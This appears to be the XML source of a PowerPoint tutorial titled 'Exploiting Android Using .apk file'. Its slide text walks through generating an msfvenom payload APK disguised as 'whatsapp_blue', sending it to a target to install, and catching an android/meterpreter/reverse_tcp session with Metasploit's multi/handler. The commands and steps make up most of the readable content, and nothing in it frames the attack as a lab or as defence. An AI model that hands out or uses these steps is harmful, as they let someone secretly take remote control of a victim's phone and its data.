              <a:off x="5897061" y="2199762"/>
              <a:ext cx="384840" cy="252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5118DED-69AD-4828-A715-481AB7EF853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68621" y="2171322"/>
                <a:ext cx="441720" cy="8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027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D9A4E-CB0E-460B-886C-24C4E77B9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464234"/>
            <a:ext cx="10515600" cy="1227088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File is created now check root folder search for “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>whatsapp_blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”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FF1665-AE65-4B73-9189-685DF7F68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27" y="1856934"/>
            <a:ext cx="10492740" cy="478301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3370E12-08A5-4265-ACBA-82A429C7AC80}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7216865" y="2715065"/>
              <a:ext cx="408240" cy="2685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3370E12-08A5-4265-ACBA-82A429C7AC8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78705" y="2676905"/>
                <a:ext cx="484200" cy="34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102826A-A944-473F-B0E1-DBC5B26E9AC0}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7948385" y="5158745"/>
              <a:ext cx="424080" cy="3715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102826A-A944-473F-B0E1-DBC5B26E9AC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10225" y="5120585"/>
                <a:ext cx="500040" cy="44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47C8D52-B085-4D70-96FD-26895C71C299}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8675945" y="5036345"/>
              <a:ext cx="403560" cy="4662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47C8D52-B085-4D70-96FD-26895C71C29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637785" y="4998185"/>
                <a:ext cx="479520" cy="54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84E3E62-19AF-4957-9507-ED0727B01551}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="9340865" y="5078465"/>
              <a:ext cx="1169640" cy="6332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84E3E62-19AF-4957-9507-ED0727B0155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302705" y="5040305"/>
                <a:ext cx="1245600" cy="70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7B72CD05-847B-4826-8C41-D8322B36473F}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4378985" y="5141105"/>
              <a:ext cx="372960" cy="5202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B72CD05-847B-4826-8C41-D8322B36473F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340825" y="5102945"/>
                <a:ext cx="448920" cy="59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D522B68A-C312-4B29-85CF-DC42D4686F7F}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6527465" y="4260545"/>
              <a:ext cx="456120" cy="5547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D522B68A-C312-4B29-85CF-DC42D4686F7F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489305" y="4222385"/>
                <a:ext cx="532080" cy="63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81A39F3-6601-4AD4-A298-0305AD88AC59}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7990505" y="4344785"/>
              <a:ext cx="324000" cy="5284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81A39F3-6601-4AD4-A298-0305AD88AC59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952345" y="4306625"/>
                <a:ext cx="399960" cy="60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DEC4C568-6CE8-4D86-A80B-863DC4A7C9B4}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3624425" y="3571505"/>
              <a:ext cx="420480" cy="5389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DEC4C568-6CE8-4D86-A80B-863DC4A7C9B4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586265" y="3533345"/>
                <a:ext cx="496440" cy="61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01FC1846-5EBF-4507-8B71-68EE83CE861B}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6485345" y="5645825"/>
              <a:ext cx="478440" cy="237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01FC1846-5EBF-4507-8B71-68EE83CE861B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447185" y="5607665"/>
                <a:ext cx="55440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2F65A55-90EB-444D-9CF1-F9FB9238DA53}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6597665" y="5866145"/>
              <a:ext cx="281880" cy="3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2F65A55-90EB-444D-9CF1-F9FB9238DA53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559505" y="5827985"/>
                <a:ext cx="357840" cy="7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2FC289AB-C425-4F9C-9F10-ACEAB37341D6}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5795945" y="5655185"/>
              <a:ext cx="450360" cy="1548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2FC289AB-C425-4F9C-9F10-ACEAB37341D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5757785" y="5617025"/>
                <a:ext cx="52632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0BC90AC-BBA4-4556-8FFC-6AC891E7C028}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2194505" y="6034985"/>
              <a:ext cx="396720" cy="4082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0BC90AC-BBA4-4556-8FFC-6AC891E7C028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156345" y="5996825"/>
                <a:ext cx="472680" cy="484200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic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9CD93FB-5CC2-45CF-ADCD-3E836A2D4867}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2617506" y="5261442"/>
            <a:ext cx="3047030" cy="97766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799392D-D47E-4DC9-946B-C29FF3D14753}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5795945" y="6239105"/>
            <a:ext cx="1983489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 err="1"/>
              <a:t>Apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file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A589C9BF-EA54-4E42-AF88-61949DD623DE}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5883065" y="1923425"/>
              <a:ext cx="405720" cy="4644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A589C9BF-EA54-4E42-AF88-61949DD623DE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5854625" y="1894985"/>
                <a:ext cx="462600" cy="10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7844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6032D-A4EF-4387-BCD0-6D705221E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448972"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>STEP2:Sending </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Apk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6E7069-9AA1-48E5-9978-EDFADC76DF82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="845127" y="1814732"/>
            <a:ext cx="107607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Send “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>apk_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>” to target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: Sending “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>whatsapp_blue.apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>” to target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Install .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> file on target.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50811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68AF9-F33E-4404-8CD9-D80875C6E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109343"/>
            <a:ext cx="10515600" cy="1325562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>STEP3:Exploit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E632CB-BB85-401D-9994-95CB09C7ACC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="943175" y="1225689"/>
            <a:ext cx="1030565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Use Metasploit-framework to exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Type “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>msfcosnole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>” in terminal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Type “use multi/handler”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Set payload which was set for before in “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Type “set payload android/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>”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Set  LHOST(your local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) which was set before in ”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Type set LHOST “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>your_local_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>”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Set LPORT which was set before in “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Type set LPORT “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>port_no</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>”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Type “exploit”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102304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6B5E2-5A28-41E9-926C-41C43D06C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 Metasploit-framework to exploit.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfcosnole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” in terminal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0DE188-F0C7-4E97-91E3-D2A8C8AEA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127" y="1743013"/>
            <a:ext cx="10498222" cy="491100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BE39C1DB-6DE9-476D-91A0-25CD8C153557}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5894225" y="1797425"/>
              <a:ext cx="469440" cy="597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BE39C1DB-6DE9-476D-91A0-25CD8C15355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65785" y="1768985"/>
                <a:ext cx="526320" cy="116640"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent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2BBD5F0-2D17-4CED-BA2F-E5D59908FA63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1519312" y="4360985"/>
            <a:ext cx="6344528" cy="213125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F3D9990-75F3-48FA-A569-22D9034066FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7863840" y="4234375"/>
            <a:ext cx="2250831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Metasploit started</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="530399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273B8-48DB-49F8-AF0E-69F3F968F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697" y="225083"/>
            <a:ext cx="10515600" cy="2363373"/>
          </a:xfrm>
        </p:spPr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Set payload which was set for before in “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type “use multi/handler”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type “set payload android/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”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C6A2EB-DCF5-453F-9ECA-70F9377A6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3213" y="2522163"/>
            <a:ext cx="9326880" cy="420922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3380246-9C2B-433C-98BA-98BF885879A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5120640" y="3671668"/>
            <a:ext cx="2658794" cy="13082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2585C1A-9E34-404C-BF54-9F14B3F43835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7779434" y="4979963"/>
            <a:ext cx="113948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payload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A8C028E-791F-40C4-ACC2-60069960EF8B}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5592501" y="2610725"/>
              <a:ext cx="384480" cy="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A8C028E-791F-40C4-ACC2-60069960EF8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64061" y="2582285"/>
                <a:ext cx="441360" cy="5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04539625"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Process 03 16x9">
  <a:themeElements>
    <a:clrScheme name="Process03_16x9">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="262626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Process03_16x9">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="262626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Process03_16x9">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="262626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ADBDFAA-5DAE-4B25-8F84-56997B5A601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Circle Arrow Process Chart SmartArt Slide (blue-green on black, widescreen)</Template>
  <TotalTime>0</TotalTime>
  <Words>382</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>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Corbel</vt:lpstr>
      <vt:lpstr>Process 03 16x9</vt:lpstr>
      <vt:lpstr>Exploiting Android Using .apk file</vt:lpstr>
      <vt:lpstr>STEP1:Create apk </vt:lpstr>
      <vt:lpstr>Find your local ip. Type “ifconfig”</vt:lpstr>
      <vt:lpstr>eg:msfvenom –p “payload_here”  LHOST “your_local_ip” LPORT “any_port_no” R &gt; “apk_name” </vt:lpstr>
      <vt:lpstr>File is created now check root folder search for “whatsapp_blue” </vt:lpstr>
      <vt:lpstr>STEP2:Sending Apk</vt:lpstr>
      <vt:lpstr>STEP3:Exploit</vt:lpstr>
      <vt:lpstr>Use Metasploit-framework to exploit. Type “msfcosnole” in terminal </vt:lpstr>
      <vt:lpstr>Set payload which was set for before in “msfvenom” Type “use multi/handler” Type “set payload android/meterpreter/reverse_tcp” </vt:lpstr>
      <vt:lpstr>Set  LHOST(your local ip) which was set before in ”msfvenom” Type set LHOST “your_local_ip” </vt:lpstr>
      <vt:lpstr>Set LPORT which was set before in “msfvenom” Type set LPORT “port_no” </vt:lpstr>
      <vt:lpstr>Type “exploit”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2018-04-14T05:33:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-04-14T07:05:07Z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TC028889129991</vt:lpwstr>
  </property>
</Properties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>